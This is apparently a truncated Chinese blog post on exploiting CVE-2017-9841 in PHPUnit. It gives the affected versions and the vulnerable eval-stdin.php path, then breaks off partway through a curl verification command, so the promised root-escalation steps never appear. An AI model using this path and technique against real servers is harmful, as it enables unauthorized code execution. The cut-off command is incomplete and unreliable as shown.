CVE-2017-9841到root提权
# CVE-2017-9841漏洞利用与提权技术详解
## 漏洞概述
CVE-2017-9841是PHPUnit组件中的一个远程代码执行(RCE)漏洞,影响版本包括:
- 4.8.19至4.8.27
- 5.0.10至5.6.2
漏洞位于文件`vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`,该文件未做任何过滤直接执行传入的PHP代码。
## 漏洞验证
使用curl命令验证漏洞存在:
```bash
curl --data "'\'
2025-08-27 19:49:05
0